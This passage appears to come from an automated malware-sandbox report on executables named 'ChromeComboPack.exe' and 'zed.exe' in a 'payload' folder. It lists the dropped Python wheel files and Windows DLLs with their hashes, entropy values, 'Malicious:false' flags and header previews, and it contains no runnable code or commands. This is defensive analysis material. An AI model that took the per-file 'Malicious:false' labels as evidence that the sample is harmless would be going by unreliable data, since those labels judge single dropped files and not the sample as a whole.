                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):123904
                                                                                                                                                                                                                                            Entropy (8bit):5.966619585818369
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:07jbPA0SD9S3vrCqf93qMHxCjdLZn1Ya:07jtS9SfuCRCjFV
                                                                                                                                                                                                                                            MD5:47C91C74BB2C5CF696626AF04F3705AB
                                                                                                                                                                                                                                            SHA1:C086BC2825969756169FAB7DD2E560D360E1E09C
                                                                                                                                                                                                                                            SHA-256:F6EAD250FC2DE4330BD26079A44DED7F55172E05A70E28AD85D09E7881725155
                                                                                                                                                                                                                                            SHA-512:E6B6A4425B3E30CEA7BF8B09971FA0C84D6317B1A37BC1518266DC8D72C166099A8FC40A9B985300901BD921E444FF438FD30B814C1F1C6A051DF3471615C2BD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.v.S.......Q.......E.......].......V.....Q...A...R...U........\.....T.....T...RichU...........PE..d......d.........." ................(........................................ ............`..........................................o..................d.......................H....G..T............................H..8............................................text...~........................... ..`.rdata..............................@..@.data....-.......(..................@....pdata..............................@..@.rsrc...d...........................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                                                            Entropy (8bit):4.640339306680604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
                                                                                                                                                                                                                                            MD5:BCD8CAAF9342AB891BB1D8DD45EF0098
                                                                                                                                                                                                                                            SHA1:EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
                                                                                                                                                                                                                                            SHA-256:78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
                                                                                                                                                                                                                                            SHA-512:8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                                            MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                                            SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                                            SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                                            SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                                            Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                                            MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                                            SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                                            SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                                            SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                                            MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                                            SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                                            SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                                            SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36352
                                                                                                                                                                                                                                            Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                                            MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                                            SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                                            SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                                            SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                                            Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                                            MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                                            SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                                            SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                                            SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                            Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                                            MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                                            SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                                            SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                                            SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20992
                                                                                                                                                                                                                                            Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                            MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                            SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                            SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                            SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):24576
                                                                                                                                                                                                                                            Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                            MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                                            SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                                            SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                                            SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                                            MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                                            SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
                                                                                                                                                                                                                                            SHA-256:6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
                                                                                                                                                                                                                                            SHA-512:617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                                                            Entropy (8bit):5.159963979391524
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
                                                                                                                                                                                                                                            MD5:899895C0ED6830C4C9A3328CC7DF95B6
                                                                                                                                                                                                                                            SHA1:C02F14EBDA8B631195068266BA20E03210ABEABC
                                                                                                                                                                                                                                            SHA-256:18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
                                                                                                                                                                                                                                            SHA-512:0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                                            Entropy (8bit):5.270418334522813
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
                                                                                                                                                                                                                                            MD5:C4C525B081F8A0927091178F5F2EE103
                                                                                                                                                                                                                                            SHA1:A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
                                                                                                                                                                                                                                            SHA-256:4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
                                                                                                                                                                                                                                            SHA-512:7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56832
                                                                                                                                                                                                                                            Entropy (8bit):4.231032526864278
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
                                                                                                                                                                                                                                            MD5:F9E266F763175B8F6FD4154275F8E2F0
                                                                                                                                                                                                                                            SHA1:8BE457700D58356BC2FA7390940611709A0E5473
                                                                                                                                                                                                                                            SHA-256:14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
                                                                                                                                                                                                                                            SHA-512:EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):57344
                                                                                                                                                                                                                                            Entropy (8bit):4.252429732285762
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
                                                                                                                                                                                                                                            MD5:DECF524B2D53FCD7D4FA726F00B3E5FC
                                                                                                                                                                                                                                            SHA1:E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
                                                                                                                                                                                                                                            SHA-256:58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
                                                                                                                                                                                                                                            SHA-512:EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.690163963718492
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
                                                                                                                                                                                                                                            MD5:80BB1E0E06ACAF03A0B1D4EF30D14BE7
